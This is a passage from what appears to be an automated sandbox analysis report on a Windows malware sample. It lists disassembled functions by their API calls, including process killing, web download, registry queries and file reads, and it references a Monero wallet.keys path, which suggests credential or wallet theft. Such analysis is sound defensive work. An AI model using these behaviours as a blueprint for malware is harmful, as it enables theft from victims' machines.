                                    • Part of subcall function 00E799A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E79A4E
                                    • Part of subcall function 00E799A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E79A6C
                                    • Part of subcall function 00E799A0: CloseHandle.KERNEL32(00000000), ref: 00E79A79
                                    • Part of subcall function 00E799A0: CloseHandle.KERNEL32(00E6A056), ref: 00E79A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 531068710-2746444292
                                  • Opcode ID: 5614c4a50a7174ebfcc3fef174f9d6570d7dbc287cfc3c108802a7c96c680bb9
                                  • Instruction ID: debf3ac5750bc9eb5147eb6d632f84512b167def525870d9172ccd66bdbba2d7
                                  • Opcode Fuzzy Hash: 5614c4a50a7174ebfcc3fef174f9d6570d7dbc287cfc3c108802a7c96c680bb9
                                  • Instruction Fuzzy Hash: FF5185B1944318ABEB24DB60DC4AFDA77B8AB44704F044598F60DBB2C1EB759B88CF51
                                  Function 00EDF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00EDFA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00EDFA27
                                  • _ValidateLocalCookies.LIBCMT ref: 00EDFAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00EDFADB
                                  • _ValidateLocalCookies.LIBCMT ref: 00EDFB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: 675aa9ded62f6a0b53526d8c258a05e748edbf656850564cd993f6058d0a1715
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: A941B430A00218EFCF10DF69C880A9EBBF5FF49314F149166E81ABB392D7319946CB91
                                  Function 00E65000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E6501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E65021
                                  • InternetOpenA.WININET(00E80DE3,00000000,00000000,00000000,00000000), ref: 00E6503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E65061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E65091
                                  • InternetCloseHandle.WININET(?), ref: 00E65109
                                  • InternetCloseHandle.WININET(?), ref: 00E65116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 8f8dce039544cd07e7d73b1d2b18f38a09810aa1eaacf9fd8767d7252c29972f
                                  • Instruction ID: ae7f0d204e2c962c269ed2dfa3f486e8a2228efe60a288dfb829b0f719cab599
                                  • Opcode Fuzzy Hash: 8f8dce039544cd07e7d73b1d2b18f38a09810aa1eaacf9fd8767d7252c29972f
                                  • Instruction Fuzzy Hash: BA3116F5A40218ABDB24CF54DC85BDDB7B5AB48304F1081E8FA09B7285C7B06AC58F98
                                  Function 00E7856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E785B6
                                  • wsprintfA.USER32 ref: 00E785E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E7860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E7861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E78629
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0173DD50,00000000,000F003F,?,00000400), ref: 00E7867C
                                  • lstrlen.KERNEL32(?), ref: 00E78691
                                  • RegQueryValueExA.ADVAPI32(00000000,0173DCF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E80B3C), ref: 00E78729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E78798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E787AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: c99eb1ae1eb8e239909bd66fa0af0a86c995743a9d8aa7b1314aaf62eeb0f461
                                  • Instruction ID: f851525f2ba8dabc63dfadfc3e59c49399246426879a44a26d516012224ae7e1
                                  • Opcode Fuzzy Hash: c99eb1ae1eb8e239909bd66fa0af0a86c995743a9d8aa7b1314aaf62eeb0f461
                                  • Instruction Fuzzy Hash: 78210CB1950218ABDB28DB54CC85FE9B3B8FB48704F10C1E9E60DA6184DF706A85CF94
                                  Function 00E799A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E799C5
                                  • Process32First.KERNEL32(00E6A056,00000128), ref: 00E799D9
                                  • Process32Next.KERNEL32(00E6A056,00000128), ref: 00E799F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E79A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E79A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 00E79A79
                                  • CloseHandle.KERNEL32(00E6A056), ref: 00E79A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: d8510c271c797d6750c9243b3139c18bbb4dc32d646973352d453b683d6fa83e
                                  • Instruction ID: 094900c5d70f8270cb928ae9f8716302c491e460615615d192828e68c45d76e7
                                  • Opcode Fuzzy Hash: d8510c271c797d6750c9243b3139c18bbb4dc32d646973352d453b683d6fa83e
                                  • Instruction Fuzzy Hash: F321B7B5900218ABDB35DFA1D889BEDB7B9BF48304F108198E519A6285D7749AC4CF90
                                  Function 00E77820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E7783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0172B958,00000000,00020119,00000000), ref: 00E7786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0173DC00,00000000,00000000,?,000000FF), ref: 00E7788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E77898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: dc4141b6cbf5a477b607db82d72d8882f63473007e83cdeb3caf25621ffa214a
                                  • Instruction ID: f534b87330b4ca2a0114c2745f28dddcf6d9144e5ff9ba13d2e8101c60503880
                                  • Opcode Fuzzy Hash: dc4141b6cbf5a477b607db82d72d8882f63473007e83cdeb3caf25621ffa214a
                                  • Instruction Fuzzy Hash: 320167B5A04305BBEB18DBD4DD49F6D77B8EB44700F104064FA58A7288D7709A40DB51
                                  Function 00E79470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E73D3E,?), ref: 00E7948C
                                  • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E794A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E794B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: >=$>=
                                  • API String ID: 1378416451-3543398223
                                  • Opcode ID: d4acd2e4abdb11b94eccd8283963b132f5d2af3995200390403cb910740fc860
                                  • Instruction ID: c0b8c3a712a55a26779e295223006769fc663279dc8a9fa289913bc106228c9d
                                  • Opcode Fuzzy Hash: d4acd2e4abdb11b94eccd8283963b132f5d2af3995200390403cb910740fc860
                                  • Instruction Fuzzy Hash: 48F04479E00208BBDB24DFB0DC89F9E77BAAB48714F10C554FA65A71C4E67096419B80
                                  Function 00E6A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E6A13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E6A161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E6A181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00E6148F,00000000), ref: 00E6A1AA
                                  • LocalFree.KERNEL32(00E6148F), ref: 00E6A1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 00E6A1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 22b74713e63835b2ff3e53be5ca1a47e33003e5a9c0b2daddac42f8a9c6be134
                                  • Instruction ID: 013acb7c9aa271e510184373eb5925a930df85dbe7f203ae42de692291ef3a6a
                                  • Opcode Fuzzy Hash: 22b74713e63835b2ff3e53be5ca1a47e33003e5a9c0b2daddac42f8a9c6be134
                                  • Instruction Fuzzy Hash: 6F313AB4E40209EFDB24CFA0D885BEE77B5BB49344F109168E911B7284D774AA80CFA1
                                  Function 00E749D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0173DE58), ref: 00E74A2B
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E74A51
                                  • lstrcat.KERNEL32(?,?), ref: 00E74A70
                                  • lstrcat.KERNEL32(?,?), ref: 00E74A84
                                  • lstrcat.KERNEL32(?,0172AE90), ref: 00E74A97
                                  • lstrcat.KERNEL32(?,?), ref: 00E74AAB
                                  • lstrcat.KERNEL32(?,0173D480), ref: 00E74ABF
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E78F20: GetFileAttributesA.KERNEL32(00000000,?,00E61B94,?,?,00E8577C,?,?,00E80E22), ref: 00E78F2F
                                    • Part of subcall function 00E747C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E747D0
                                    • Part of subcall function 00E747C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E747D7
                                    • Part of subcall function 00E747C0: wsprintfA.USER32 ref: 00E747F6
                                    • Part of subcall function 00E747C0: FindFirstFileA.KERNEL32(?,?), ref: 00E7480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 3347bc7da635a68b4726f4ac70c14839f55f274a3dae67009d0e9059d42d72a8
                                  • Instruction ID: 0df4563fcf62f438e98f3ae38b0faee640a46fc68e264fc8f89cc317be7d6ba3
                                  • Opcode Fuzzy Hash: 3347bc7da635a68b4726f4ac70c14839f55f274a3dae67009d0e9059d42d72a8
                                  • Instruction Fuzzy Hash: B23173F694020867CB28FBB0DD89EDD737CAB58700F408599F619A6085EF70A7C8CB94
                                  Function 00E72EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
